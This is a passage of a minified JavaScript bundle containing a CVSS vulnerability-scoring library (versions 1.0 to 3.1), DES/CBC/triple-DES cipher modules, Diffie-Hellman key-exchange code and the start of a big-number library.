le?le(ve):le}},g=Object(j.getMetricCodeMap)(E,{Authentication:"Au",Uncorroborated:"UR",Unconfirmed:"UC","Medium-High":"MH","Low-Medium":"LM"}),b=function(){function se(z){(function(l,f){if(!(l instanceof f))throw new TypeError("Cannot call a class as a function")})(this,se),this.cvss=z}var ve,le,ye;return ve=se,ye=[{key:"getMetricCodeMap",value:function(){return g}}],(le=[{key:"getImpactScore",value:function(){return 10.41*(1-(1-E.get("Confidentiality",this.cvss))*(1-E.get("Integrity",this.cvss))*(1-E.get("Availability",this.cvss)))}},{key:"getExploitabilityScore",value:function(){return 20*E.get("Access Vector",this.cvss)*E.get("Access Complexity",this.cvss)*E.get("Authentication",this.cvss)}},{key:"getBaseScore",value:function(){var z=this.getImpactScore(),l=this.getExploitabilityScore(),f=0;return z>0&&(f=1.176*(.6*z+.4*l-1.5)),Object(j.round)(f)}},{key:"getTemporalScore",value:function(){return Object(j.round)(this.getBaseScore()*E.get("Exploitability",this.cvss)*E.get("Remediation Level",this.cvss)*E.get("Report Confidence",this.cvss))}},{key:"getEnvironmentalScore",value:function(){var z=1.176*(.6*Math.min(10,10.41*(1-(1-E.get("Confidentiality",this.cvss)*E.get("Confidentiality Requirement",this.cvss))*(1-E.get("Integrity",this.cvss)*E.get("Integrity Requirement",this.cvss))*(1-E.get("Availability",this.cvss)*E.get("Availability Requirement",this.cvss))))+.4*this.getExploitabilityScore()-1.5),l=Object(j.round)(z*E.get("Exploitability",this.cvss)*E.get("Remediation Level",this.cvss)*E.get("Report Confidence",this.cvss));return Object(j.round)((l+(10-l)*E.get("Collateral Damage Potential",this.cvss))*E.get("Target Distribution",this.cvss))}}])&&F(ve.prototype,le),ye&&F(ve,ye),se}();function _(se,ve){for(var le=0;le<ve.length;le++){var ye=ve[le];ye.enumerable=ye.enumerable||!1,ye.configurable=!0,"value"in ye&&(ye.writable=!0),Object.defineProperty(se,ye.key,ye)}}var y={"Attack Vector":{Network:.85,"Adjacent Network":.62,Local:.55,Physical:.2}};y["Modified Attack Vector"]=y["Attack Vector"],y["Attack Complexity"]={Low:.77,High:.44},y["Modified Attack Complexity"]=y["Attack Complexity"],y["Privilege Required"]={None:.85,Low:function(se){return"Changed"===se.Scope?.68:.62},High:function(se){return"Changed"===se.Scope?.5:.27}},y["Modified Privilege Required"]={None:.85,Low:function(se){return"Changed"===se["Modified Scope"]?.68:.62},High:function(se){return"Changed"===se["Modified Scope"]?.5:.27}},y["User Interaction"]={None:.85,Required:.62},y["Modified User Interaction"]=y["User Interaction"],y.Scope={Unchanged:1,Changed:1},y["Modified Scope"]=y.Scope,y.Confidentiality={High:.56,Low:.22,None:0},y["Modified Confidentiality"]=y.Confidentiality,y.Integrity={High:.56,Low:.22,None:0},y["Modified Integrity"]=y.Integrity,y.Availability={High:.56,Low:.22,None:0},y["Modified Availability"]=y.Availability,y["Exploit Code Maturity"]={"Not Defined":1,High:1,Functional:.97,"Proof of Concept":.94,Unproven:.91},y["Remediation Level"]={"Not Defined":1,Unavailable:1,Workaround:.97,"Temporary Fix ":.96,"Official Fix":.95},y["Report Confidence"]={"Not Defined":1,Confirmed:1,Reasonable:.96,Unknown:.92},y["Confidentiality Requirement"]={"Not Defined":1,High:1.5,Medium:1,Low:.5},y["Integrity Requirement"]={"Not Defined":1,High:1.5,Medium:1,Low:.5},y["Availability Requirement"]={"Not Defined":1,High:1.5,Medium:1,Low:.5},y.get=function(se,ve){if(!ve[se])return Object.values(this[se])[0];var le=this[se][ve[se]];return"function"==typeof le?le(ve):le};var M=Object(j.getMetricCodeMap)(y,{"Exploit Code Maturity":"E","Not Defined":"X"}),p=function(){function se(z){(function(l,f){if(!(l instanceof f))throw new TypeError("Cannot call a class as a function")})(this,se),this.cvss=z}var ve,le,ye;return ve=se,ye=[{key:"getMetricCodeMap",value:function(){return M}}],(le=[{key:"getImpactScore",value:function(){var z=1-(1-y.get("Confidentiality",this.cvss))*(1-y.get("Integrity",this.cvss))*(1-y.get("Availability",this.cvss));return"Changed"===this.cvss.Scope?7.52*(z-.029)-3.25*Math.pow(z-.02,15):6.42*z}},{key:"getExploitabilityScore",value:function(){return 8.22*y.get("Attack Vector",this.cvss)*y.get("Attack Complexity",this.cvss)*y.get("Privilege Required",this.cvss)*y.get("User Interaction",this.cvss)}},{key:"getBaseScore",value:function(){var z=this.getImpactScore(),l=this.getExploitabilityScore(),f=0;return z>0&&(f="Changed"===this.cvss.Scope?Math.min(1.08*(z+l),10):Math.min(z+l,10)),Object(j.roundUp)(f)}},{key:"getTemporalScore",value:function(){return Object(j.roundUp)(this.getBaseScore()*y.get("Exploit Code Maturity",this.cvss)*y.get("Remediation Level",this.cvss)*y.get("Report Confidence",this.cvss))}},{key:"getEnvironmentalScore",value:function(){var z=0,l=Math.min(1-(1-y.get("Modified Confidentiality",this.cvss)*y.get("Confidentiality Requirement",this.cvss))*(1-y.get("Modified Integrity",this.cvss)*y.get("Integrity Requirement",this.cvss))*(1-y.get("Modified Availability",this.cvss)*y.get("Availability Requirement",this.cvss)),.915),f="Changed"===this.cvss["Modified Scope"]?7.52*(l-.029)-3.25*Math.pow(l-.02,15):6.42*l,A=8.22*y.get("Modified Attack Vector",this.cvss)*y.get("Modified Attack Complexity",this.cvss)*y.get("Modified Privilege Required",this.cvss)*y.get("Modified User Interaction",this.cvss);return f>0&&(z="Changed"===this.cvss["Modified Scope"]?Object(j.roundUp)(Math.min(1.08*(f+A),10))*y.get("Exploit Code Maturity",this.cvss)*y.get("Remediation Level",this.cvss)*y.get("Report Confidence",this.cvss):Object(j.roundUp)(Math.min(f+A,10))*y.get("Exploit Code Maturity",this.cvss)*y.get("Remediation Level",this.cvss)*y.get("Report Confidence",this.cvss)),Object(j.roundUp)(z)}}])&&_(ve.prototype,le),ye&&_(ve,ye),se}();function D(se,ve){for(var le=0;le<ve.length;le++){var ye=ve[le];ye.enumerable=ye.enumerable||!1,ye.configurable=!0,"value"in ye&&(ye.writable=!0),Object.defineProperty(se,ye.key,ye)}}var w={"Attack Vector":{Network:.85,"Adjacent Network":.62,Local:.55,Physical:.2}};w["Modified Attack Vector"]=w["Attack Vector"],w["Attack Complexity"]={Low:.77,High:.44},w["Modified Attack Complexity"]=w["Attack Complexity"],w["Privilege Required"]={None:.85,Low:function(se){return"Changed"===se.Scope?.68:.62},High:function(se){return"Changed"===se.Scope?.5:.27}},w["Modified Privilege Required"]={None:.85,Low:function(se){return"Changed"===se["Modified Scope"]?.68:.62},High:function(se){return"Changed"===se["Modified Scope"]?.5:.27}},w["User Interaction"]={None:.85,Required:.62},w["Modified User Interaction"]=w["User Interaction"],w.Scope={Unchanged:1,Changed:1},w["Modified Scope"]=w.Scope,w.Confidentiality={High:.56,Low:.22,None:0},w["Modified Confidentiality"]=w.Confidentiality,w.Integrity={High:.56,Low:.22,None:0},w["Modified Integrity"]=w.Integrity,w.Availability={High:.56,Low:.22,None:0},w["Modified Availability"]=w.Availability,w["Exploit Code Maturity"]={"Not Defined":1,High:1,Functional:.97,"Proof of Concept":.94,Unproven:.91},w["Remediation Level"]={"Not Defined":1,Unavailable:1,Workaround:.97,"Temporary Fix ":.96,"Official Fix":.95},w["Report Confidence"]={"Not Defined":1,Confirmed:1,Reasonable:.96,Unknown:.92},w["Confidentiality Requirement"]={"Not Defined":1,High:1.5,Medium:1,Low:.5},w["Integrity Requirement"]={"Not Defined":1,High:1.5,Medium:1,Low:.5},w["Availability Requirement"]={"Not Defined":1,High:1.5,Medium:1,Low:.5},w.get=function(se,ve){if(!ve[se])return Object.values(this[se])[0];var le=this[se][ve[se]];return"function"==typeof le?le(ve):le};var x=Object(j.getMetricCodeMap)(w,{"Exploit Code Maturity":"E","Not Defined":"X"});function S(se,ve){return function(le){if(Array.isArray(le))return le}(se)||function(le,ye){if("undefined"!=typeof Symbol&&Symbol.iterator in Object(le)){var z=[],l=!0,f=!1,A=void 0;try{for(var v,P=le[Symbol.iterator]();!(l=(v=P.next()).done)&&(z.push(v.value),!ye||z.length!==ye);l=!0);}catch(G){f=!0,A=G}finally{try{l||null==P.return||P.return()}finally{if(f)throw A}}return z}}(se,ve)||function(le,ye){if(le){if("string"==typeof le)return O(le,ye);var z=Object.prototype.toString.call(le).slice(8,-1);if("Object"===z&&le.constructor&&(z=le.constructor.name),"Map"===z||"Set"===z)return Array.from(le);if("Arguments"===z||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(z))return O(le,ye)}}(se,ve)||function(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}function O(se,ve){(null==ve||ve>se.length)&&(ve=se.length);for(var le=0,ye=new Array(ve);le<ve;le++)ye[le]=se[le];return ye}function U(se,ve){for(var le=0;le<ve.length;le++){var ye=ve[le];ye.enumerable=ye.enumerable||!1,ye.configurable=!0,"value"in ye&&(ye.writable=!0),Object.defineProperty(se,ye.key,ye)}}var K={"1.0":Q,"2.0":b,"3.0":p,3.1:function(){function se(z){(function(l,f){if(!(l instanceof f))throw new TypeError("Cannot call a class as a function")})(this,se),this.cvss=z}var ve,le,ye;return ve=se,ye=[{key:"getMetricCodeMap",value:function(){return x}}],(le=[{key:"getImpactScore",value:function(){var z=1-(1-w.get("Confidentiality",this.cvss))*(1-w.get("Integrity",this.cvss))*(1-w.get("Availability",this.cvss));return"Changed"===this.cvss.Scope?7.52*(z-.029)-3.25*Math.pow(z-.02,15):6.42*z}},{key:"getExploitabilityScore",value:function(){return 8.22*w.get("Attack Vector",this.cvss)*w.get("Attack Complexity",this.cvss)*w.get("Privilege Required",this.cvss)*w.get("User Interaction",this.cvss)}},{key:"getBaseScore",value:function(){var z=this.getImpactScore(),l=this.getExploitabilityScore(),f=0;return z>0&&(f="Changed"===this.cvss.Scope?Math.min(1.08*(z+l),10):Math.min(z+l,10)),Object(j.roundUp)(f)}},{key:"getTemporalScore",value:function(){return Object(j.roundUp)(this.getBaseScore()*w.get("Exploit Code Maturity",this.cvss)*w.get("Remediation Level",this.cvss)*w.get("Report Confidence",this.cvss))}},{key:"getEnvironmentalScore",value:function(){var z=0,l=Math.min(1-(1-w.get("Modified Confidentiality",this.cvss)*w.get("Confidentiality Requirement",this.cvss))*(1-w.get("Modified Integrity",this.cvss)*w.get("Integrity Requirement",this.cvss))*(1-w.get("Modified Availability",this.cvss)*w.get("Availability Requirement",this.cvss)),.915),f="Changed"===this.cvss["Modified Scope"]?7.52*(l-.029)-3.25*Math.pow(.9731*l-.02,13):6.42*l,A=8.22*w.get("Modified Attack Vector",this.cvss)*w.get("Modified Attack Complexity",this.cvss)*w.get("Modified Privilege Required",this.cvss)*w.get("Modified User Interaction",this.cvss);return f>0&&(z="Changed"===this.cvss["Modified Scope"]?Object(j.roundUp)(Math.min(1.08*(f+A),10))*w.get("Exploit Code Maturity",this.cvss)*w.get("Remediation Level",this.cvss)*w.get("Report Confidence",this.cvss):Object(j.roundUp)(Math.min(f+A,10))*w.get("Exploit Code Maturity",this.cvss)*w.get("Remediation Level",this.cvss)*w.get("Report Confidence",this.cvss)),Object(j.roundUp)(z)}}])&&D(ve.prototype,le),ye&&D(ve,ye),se}()},ee=function(){function se(z,l){(function(f,A){if(!(f instanceof A))throw new TypeError("Cannot call a class as a function")})(this,se),this.cvssString=z,this.cvssMap=Object(j.parseCvssVector)(z,l,K),this.cvssClass=l||K[this.cvssMap.short.CVSS],this.obj=new this.cvssClass(this.cvssMap.long)}var ve,le;return ve=se,(le=[{key:"getImpactScore",value:function(){return Object(j.roundUp)(this.obj.getImpactScore())}},{key:"getExploitabilityScore",value:function(){return Object(j.roundUp)(this.obj.getExploitabilityScore())}},{key:"getBaseScore",value:function(){return Object(j.roundUp)(this.obj.getBaseScore())}},{key:"getTemporalScore",value:function(){return Object(j.roundUp)(this.obj.getTemporalScore())}},{key:"getEnvironmentalScore",value:function(){return Object(j.roundUp)(this.obj.getEnvironmentalScore())}},{key:"getRating",value:function(){var z=this.getBaseScore();return 0===z?"None":z<4?"Low":z<7?"Medium":z<9?"High":"Critical"}},{key:"getVersion",value:function(){return this.cvssMap.short.CVSS}},{key:"getVector",value:function(){return this.cvssMap.short}},{key:"getLongVector",value:function(){return this.cvssMap.long}},{key:"isEqual",value:function(z){for(var l=0,f=Object.entries(z.getVector());l<f.length;l++){var A=S(f[l],2);if(this.cvssMap.short[A[0]]!==A[1])return!1}return!0}}])&&U(ve.prototype,le),se}();"undefined"!=typeof window&&(window.Cvss=ee),de.default=ee}]).default},1462:(Pe,we,de)=>{"use strict";we.utils=de(5354),we.Cipher=de(5154),we.DES=de(220),we.CBC=de(6404),we.EDE=de(8258)},6404:(Pe,we,de)=>{"use strict";var ie=de(490),j=de(2270),$={};function ae(Q){ie.equal(Q.length,8,"Invalid IV length"),this.iv=new Array(8);for(var F=0;F<this.iv.length;F++)this.iv[F]=Q[F]}we.instantiate=function I(Q){function F(_){Q.call(this,_),this._cbcInit()}j(F,Q);for(var E=Object.keys($),g=0;g<E.length;g++){var b=E[g];F.prototype[b]=$[b]}return F.create=function(y){return new F(y)},F},$._cbcInit=function(){var F=new ae(this.options.iv);this._cbcState=F},$._update=function(F,E,g,b){var y=this.constructor.super_.prototype,M=this._cbcState.iv;if("encrypt"===this.type){for(var p=0;p<this.blockSize;p++)M[p]^=F[E+p];for(y._update.call(this,M,0,g,b),p=0;p<this.blockSize;p++)M[p]=g[b+p]}else{for(y._update.call(this,F,E,g,b),p=0;p<this.blockSize;p++)g[b+p]^=M[p];for(p=0;p<this.blockSize;p++)M[p]=F[E+p]}}},5154:(Pe,we,de)=>{"use strict";var ie=de(490);function j($){this.options=$,this.type=this.options.type,this.blockSize=8,this._init(),this.buffer=new Array(this.blockSize),this.bufferOff=0,this.padding=!1!==$.padding}Pe.exports=j,j.prototype._init=function(){},j.prototype.update=function(ae){return 0===ae.length?[]:"decrypt"===this.type?this._updateDecrypt(ae):this._updateEncrypt(ae)},j.prototype._buffer=function(ae,I){for(var Q=Math.min(this.buffer.length-this.bufferOff,ae.length-I),F=0;F<Q;F++)this.buffer[this.bufferOff+F]=ae[I+F];return this.bufferOff+=Q,Q},j.prototype._flushBuffer=function(ae,I){return this._update(this.buffer,0,ae,I),this.bufferOff=0,this.blockSize},j.prototype._updateEncrypt=function(ae){var I=0,Q=0,E=new Array(((this.bufferOff+ae.length)/this.blockSize|0)*this.blockSize);0!==this.bufferOff&&(I+=this._buffer(ae,I),this.bufferOff===this.buffer.length&&(Q+=this._flushBuffer(E,Q)));for(var g=ae.length-(ae.length-I)%this.blockSize;I<g;I+=this.blockSize)this._update(ae,I,E,Q),Q+=this.blockSize;for(;I<ae.length;I++,this.bufferOff++)this.buffer[this.bufferOff]=ae[I];return E},j.prototype._updateDecrypt=function(ae){for(var I=0,Q=0,F=Math.ceil((this.bufferOff+ae.length)/this.blockSize)-1,E=new Array(F*this.blockSize);F>0;F--)I+=this._buffer(ae,I),Q+=this._flushBuffer(E,Q);return I+=this._buffer(ae,I),E},j.prototype.final=function(ae){var I,Q;return ae&&(I=this.update(ae)),Q="encrypt"===this.type?this._finalEncrypt():this._finalDecrypt(),I?I.concat(Q):Q},j.prototype._pad=function(ae,I){if(0===I)return!1;for(;I<ae.length;)ae[I++]=0;return!0},j.prototype._finalEncrypt=function(){if(!this._pad(this.buffer,this.bufferOff))return[];var ae=new Array(this.blockSize);return this._update(this.buffer,0,ae,0),ae},j.prototype._unpad=function(ae){return ae},j.prototype._finalDecrypt=function(){ie.equal(this.bufferOff,this.blockSize,"Not enough data to decrypt");var ae=new Array(this.blockSize);return this._flushBuffer(ae,0),this._unpad(ae)}},220:(Pe,we,de)=>{"use strict";var ie=de(490),j=de(2270),$=de(5354),ae=de(5154);function I(){this.tmp=new Array(2),this.keys=null}function Q(E){ae.call(this,E);var g=new I;this._desState=g,this.deriveKeys(g,E.key)}j(Q,ae),Pe.exports=Q,Q.create=function(g){return new Q(g)};var F=[1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1];Q.prototype.deriveKeys=function(g,b){g.keys=new Array(32),ie.equal(b.length,this.blockSize,"Invalid key length");var _=$.readUInt32BE(b,0),y=$.readUInt32BE(b,4);$.pc1(_,y,g.tmp,0),_=g.tmp[0],y=g.tmp[1];for(var M=0;M<g.keys.length;M+=2){var p=F[M>>>1];_=$.r28shl(_,p),y=$.r28shl(y,p),$.pc2(_,y,g.keys,M)}},Q.prototype._update=function(g,b,_,y){var M=this._desState,p=$.readUInt32BE(g,b),D=$.readUInt32BE(g,b+4);$.ip(p,D,M.tmp,0),p=M.tmp[0],D=M.tmp[1],"encrypt"===this.type?this._encrypt(M,p,D,M.tmp,0):this._decrypt(M,p,D,M.tmp,0),D=M.tmp[1],$.writeUInt32BE(_,p=M.tmp[0],y),$.writeUInt32BE(_,D,y+4)},Q.prototype._pad=function(g,b){if(!1===this.padding)return!1;for(var _=g.length-b,y=b;y<g.length;y++)g[y]=_;return!0},Q.prototype._unpad=function(g){if(!1===this.padding)return g;for(var b=g[g.length-1],_=g.length-b;_<g.length;_++)ie.equal(g[_],b);return g.slice(0,g.length-b)},Q.prototype._encrypt=function(g,b,_,y,M){for(var p=b,D=_,w=0;w<g.keys.length;w+=2){var x=g.keys[w],S=g.keys[w+1];$.expand(D,g.tmp,0);var O=$.substitute(x^=g.tmp[0],S^=g.tmp[1]),K=D;D=(p^$.permute(O))>>>0,p=K}$.rip(D,p,y,M)},Q.prototype._decrypt=function(g,b,_,y,M){for(var p=_,D=b,w=g.keys.length-2;w>=0;w-=2){var x=g.keys[w],S=g.keys[w+1];$.expand(p,g.tmp,0);var O=$.substitute(x^=g.tmp[0],S^=g.tmp[1]),K=p;p=(D^$.permute(O))>>>0,D=K}$.rip(p,D,y,M)}},8258:(Pe,we,de)=>{"use strict";var ie=de(490),j=de(2270),$=de(5154),ae=de(220);function I(F,E){ie.equal(E.length,24,"Invalid key length");var g=E.slice(0,8),b=E.slice(8,16),_=E.slice(16,24);this.ciphers="encrypt"===F?[ae.create({type:"encrypt",key:g}),ae.create({type:"decrypt",key:b}),ae.create({type:"encrypt",key:_})]:[ae.create({type:"decrypt",key:_}),ae.create({type:"encrypt",key:b}),ae.create({type:"decrypt",key:g})]}function Q(F){$.call(this,F);var E=new I(this.type,this.options.key);this._edeState=E}j(Q,$),Pe.exports=Q,Q.create=function(E){return new Q(E)},Q.prototype._update=function(E,g,b,_){var y=this._edeState;y.ciphers[0]._update(E,g,b,_),y.ciphers[1]._update(b,_,b,_),y.ciphers[2]._update(b,_,b,_)},Q.prototype._pad=ae.prototype._pad,Q.prototype._unpad=ae.prototype._unpad},5354:(Pe,we)=>{"use strict";we.readUInt32BE=function(ae,I){return(ae[0+I]<<24|ae[1+I]<<16|ae[2+I]<<8|ae[3+I])>>>0},we.writeUInt32BE=function(ae,I,Q){ae[0+Q]=I>>>24,ae[1+Q]=I>>>16&255,ae[2+Q]=I>>>8&255,ae[3+Q]=255&I},we.ip=function(ae,I,Q,F){for(var E=0,g=0,b=6;b>=0;b-=2){for(var _=0;_<=24;_+=8)E<<=1,E|=I>>>_+b&1;for(_=0;_<=24;_+=8)E<<=1,E|=ae>>>_+b&1}for(b=6;b>=0;b-=2){for(_=1;_<=25;_+=8)g<<=1,g|=I>>>_+b&1;for(_=1;_<=25;_+=8)g<<=1,g|=ae>>>_+b&1}Q[F+0]=E>>>0,Q[F+1]=g>>>0},we.rip=function(ae,I,Q,F){for(var E=0,g=0,b=0;b<4;b++)for(var _=24;_>=0;_-=8)E<<=1,E|=I>>>_+b&1,E<<=1,E|=ae>>>_+b&1;for(b=4;b<8;b++)for(_=24;_>=0;_-=8)g<<=1,g|=I>>>_+b&1,g<<=1,g|=ae>>>_+b&1;Q[F+0]=E>>>0,Q[F+1]=g>>>0},we.pc1=function(ae,I,Q,F){for(var E=0,g=0,b=7;b>=5;b--){for(var _=0;_<=24;_+=8)E<<=1,E|=I>>_+b&1;for(_=0;_<=24;_+=8)E<<=1,E|=ae>>_+b&1}for(_=0;_<=24;_+=8)E<<=1,E|=I>>_+b&1;for(b=1;b<=3;b++){for(_=0;_<=24;_+=8)g<<=1,g|=I>>_+b&1;for(_=0;_<=24;_+=8)g<<=1,g|=ae>>_+b&1}for(_=0;_<=24;_+=8)g<<=1,g|=ae>>_+b&1;Q[F+0]=E>>>0,Q[F+1]=g>>>0},we.r28shl=function(ae,I){return ae<<I&268435455|ae>>>28-I};var de=[14,11,17,4,27,23,25,0,13,22,7,18,5,9,16,24,2,20,12,21,1,8,15,26,15,4,25,19,9,1,26,16,5,11,23,8,12,7,17,0,22,3,10,14,6,20,27,24];we.pc2=function(ae,I,Q,F){for(var E=0,g=0,b=de.length>>>1,_=0;_<b;_++)E<<=1,E|=ae>>>de[_]&1;for(_=b;_<de.length;_++)g<<=1,g|=I>>>de[_]&1;Q[F+0]=E>>>0,Q[F+1]=g>>>0},we.expand=function(ae,I,Q){var F=0,E=0;F=(1&ae)<<5|ae>>>27;for(var g=23;g>=15;g-=4)F<<=6,F|=ae>>>g&63;for(g=11;g>=3;g-=4)E|=ae>>>g&63,E<<=6;E|=(31&ae)<<1|ae>>>31,I[Q+0]=F>>>0,I[Q+1]=E>>>0};var ie=[14,0,4,15,13,7,1,4,2,14,15,2,11,13,8,1,3,10,10,6,6,12,12,11,5,9,9,5,0,3,7,8,4,15,1,12,14,8,8,2,13,4,6,9,2,1,11,7,15,5,12,11,9,3,7,14,3,10,10,0,5,6,0,13,15,3,1,13,8,4,14,7,6,15,11,2,3,8,4,14,9,12,7,0,2,1,13,10,12,6,0,9,5,11,10,5,0,13,14,8,7,10,11,1,10,3,4,15,13,4,1,2,5,11,8,6,12,7,6,12,9,0,3,5,2,14,15,9,10,13,0,7,9,0,14,9,6,3,3,4,15,6,5,10,1,2,13,8,12,5,7,14,11,12,4,11,2,15,8,1,13,1,6,10,4,13,9,0,8,6,15,9,3,8,0,7,11,4,1,15,2,14,12,3,5,11,10,5,14,2,7,12,7,13,13,8,14,11,3,5,0,6,6,15,9,0,10,3,1,4,2,7,8,2,5,12,11,1,12,10,4,14,15,9,10,3,6,15,9,0,0,6,12,10,11,1,7,13,13,8,15,9,1,4,3,5,14,11,5,12,2,7,8,2,4,14,2,14,12,11,4,2,1,12,7,4,10,7,11,13,6,1,8,5,5,0,3,15,15,10,13,3,0,9,14,8,9,6,4,11,2,8,1,12,11,7,10,1,13,14,7,2,8,13,15,6,9,15,12,0,5,9,6,10,3,4,0,5,14,3,12,10,1,15,10,4,15,2,9,7,2,12,6,9,8,5,0,6,13,1,3,13,4,14,14,0,7,11,5,3,11,8,9,4,14,3,15,2,5,12,2,9,8,5,12,15,3,10,7,11,0,14,4,1,10,7,1,6,13,0,11,8,6,13,4,13,11,0,2,11,14,7,15,4,0,9,8,1,13,10,3,14,12,3,9,5,7,12,5,2,10,15,6,8,1,6,1,6,4,11,11,13,13,8,12,1,3,4,7,10,14,7,10,9,15,5,6,0,8,15,0,14,5,2,9,3,2,12,13,1,2,15,8,13,4,8,6,10,15,3,11,7,1,4,10,12,9,5,3,6,14,11,5,0,0,14,12,9,7,2,7,2,11,1,4,14,1,7,9,4,12,10,14,8,2,13,0,15,6,12,10,9,13,0,15,3,3,5,5,6,8,11];we.substitute=function(ae,I){for(var Q=0,F=0;F<4;F++)Q<<=4,Q|=ie[64*F+(ae>>>18-6*F&63)];for(F=0;F<4;F++)Q<<=4,Q|=ie[256+64*F+(I>>>18-6*F&63)];return Q>>>0};var j=[16,25,12,11,3,20,4,15,31,17,9,6,27,14,1,22,30,24,8,18,0,5,29,23,13,19,2,26,10,21,28,7];we.permute=function(ae){for(var I=0,Q=0;Q<j.length;Q++)I<<=1,I|=ae>>>j[Q]&1;return I>>>0},we.padSplit=function(ae,I,Q){for(var F=ae.toString(2);F.length<I;)F="0"+F;for(var E=[],g=0;g<I;g+=Q)E.push(F.slice(g,g+Q));return E.join(" ")}},782:(Pe,we,de)=>{var ie=de(5449).Buffer,j=de(3193),$=de(9799),ae=de(2625),Q={binary:!0,hex:!0,base64:!0};we.DiffieHellmanGroup=we.createDiffieHellmanGroup=we.getDiffieHellman=function I(E){var g=new ie($[E].prime,"hex"),b=new ie($[E].gen,"hex");return new ae(g,b)},we.createDiffieHellman=we.DiffieHellman=function F(E,g,b,_){return ie.isBuffer(g)||void 0===Q[g]?F(E,"binary",g,b):(g=g||"binary",_=_||"binary",b=b||new ie([2]),ie.isBuffer(b)||(b=new ie(b,_)),"number"==typeof E?new ae(j(E,b),b,!0):(ie.isBuffer(E)||(E=new ie(E,g)),new ae(E,b,!0)))}},2625:(Pe,we,de)=>{var ie=de(5449).Buffer,j=de(4424),ae=new(de(2465)),I=new j(24),Q=new j(11),F=new j(10),E=new j(3),g=new j(7),b=de(3193),_=de(2419);function y(S,O){return O=O||"utf8",ie.isBuffer(S)||(S=new ie(S,O)),this._pub=new j(S),this}function M(S,O){return O=O||"utf8",ie.isBuffer(S)||(S=new ie(S,O)),this._priv=new j(S),this}Pe.exports=w;var p={};function w(S,O,U){this.setGenerator(O),this.__prime=new j(S),this._prime=j.mont(this.__prime),this._primeLen=S.length,this._pub=void 0,this._priv=void 0,this._primeCode=void 0,U?(this.setPublicKey=y,this.setPrivateKey=M):this._primeCode=8}function x(S,O){var U=new ie(S.toArray());return O?U.toString(O):U}Object.defineProperty(w.prototype,"verifyError",{enumerable:!0,get:function(){return"number"!=typeof this._primeCode&&(this._primeCode=function D(S,O){var U=O.toString("hex"),K=[U,S.toString(16)].join("_");if(K in p)return p[K];var se,ee=0;if(S.isEven()||!b.simpleSieve||!b.fermatTest(S)||!ae.test(S))return ee+=1,p[K]=ee+="02"===U||"05"===U?8:4,ee;switch(ae.test(S.shrn(1))||(ee+=2),U){case"02":S.mod(I).cmp(Q)&&(ee+=8);break;case"05":(se=S.mod(F)).cmp(E)&&se.cmp(g)&&(ee+=8);break;default:ee+=4}return p[K]=ee,ee}(this.__prime,this.__gen)),this._primeCode}}),w.prototype.generateKeys=function(){return this._priv||(this._priv=new j(_(this._primeLen))),this._pub=this._gen.toRed(this._prime).redPow(this._priv).fromRed(),this.getPublicKey()},w.prototype.computeSecret=function(S){var O=(S=(S=new j(S)).toRed(this._prime)).redPow(this._priv).fromRed(),U=new ie(O.toArray()),K=this.getPrime();if(U.length<K.length){var ee=new ie(K.length-U.length);ee.fill(0),U=ie.concat([ee,U])}return U},w.prototype.getPublicKey=function(O){return x(this._pub,O)},w.prototype.getPrivateKey=function(O){return x(this._priv,O)},w.prototype.getPrime=function(S){return x(this.__prime,S)},w.prototype.getGenerator=function(S){return x(this._gen,S)},w.prototype.setGenerator=function(S,O){return O=O||"utf8",ie.isBuffer(S)||(S=new ie(S,O)),this.__gen=S,this._gen=new j(S),this}},3193:(Pe,we,de)=>{var ie=de(2419);Pe.exports=K,K.simpleSieve=O,K.fermatTest=U;var j=de(4424),$=new j(24),I=new(de(2465)),Q=new j(1),F=new j(2),E=new j(5),_=(new j(16),new j(8),new j(10)),y=new j(3),p=(new j(7),new j(11)),D=new j(4),x=(new j(12),null);function O(ee){for(var se=function S(){if(null!==x)return x;var se=[];se[0]=2;for(var ve=1,le=3;le<1048576;le+=2){for(var ye=Math.ceil(Math.sqrt(le)),z=0;z<ve&&se[z]<=ye&&le%se[z]!=0;z++);ve!==z&&se[z]<=ye||(se[ve++]=le)}return x=se,se}(),ve=0;ve<se.length;ve++)if(0===ee.modn(se[ve]))return 0===ee.cmpn(se[ve]);return!0}function U(ee){var se=j.mont(ee);return 0===F.toRed(se).redPow(ee.subn(1)).fromRed().cmpn(1)}function K(ee,se){if(ee<16)return new j(2===se||5===se?[140,123]:[140,39]);se=new j(se);for(var ve,le;;){for(ve=new j(ie(Math.ceil(ee/8)));ve.bitLength()>ee;)ve.ishrn(1);if(ve.isEven()&&ve.iadd(Q),ve.testn(1)||ve.iadd(F),se.cmp(F)){if(!se.cmp(E))for(;ve.mod(_).cmp(y);)ve.iadd(D)}else for(;ve.mod($).cmp(p);)ve.iadd(D);if(O(le=ve.shrn(1))&&O(ve)&&U(le)&&U(ve)&&I.test(le)&&I.test(ve))return ve}}},4424:function(Pe,we,de){!function(ie,j){"use strict";function $(z,l){if(!z)throw new Error(l||"Assertion failed")}function ae(z,l){z.super_=l;var f=function(){};f.prototype=l.prototype,z.prototype=new f,z.prototype.constructor=z}function I(z,l,f){if(I.isBN(z))return z;this.negative=0,this.words=null,this.length=0,this.red=null,null!==z&&(("le"===l||"be"===l)&&(f=l,l=10),this._init(z||0,l||10,f||"be"))}var Q;"object"==typeof ie?ie.exports=I:j.BN=I,I.BN=I,I.wordSize=26;try{Q="undefined"!=typeof window&&void 0!==window.Buffer?window.Buffer:de(7748).Buffer}catch(z){}function F(z,l){var f=z.charCodeAt(l);return f>=65&&f<=70?f-55:f>=97&&f<=102?f-87:f-48&15}function E(z,l,f){var A=F(z,f);return f-1>=l&&(A|=F(z,f-1)<<4),A}function g(z,l,f,A){for(var v=0,P=Math.min(z.length,f),G=l;G<P;G++){var X=z.charCodeAt(G)-48;v*=A,v+=X>=49?X-49+10:X>=17?X-17+10:X}return v}I.isBN=function(l){return l instanceof I||null!==l&&"object"==typeof l&&l.constructor.wordSize===I.wordSize&&Array.isArray(l.words)},I.max=function(l,f){return l.cmp(f)>0?l:f},I.min=function(l,f){return l.cmp(f)<0?l:f},I.prototype._init=function(l,f,A){if("number"==typeof l)return this._initNumber(l,f,A);if("object"==typeof l)return this._initArray(l,f,A);"hex"===f&&(f=16),$(f===(0|f)&&f>=2&&f<=36);var 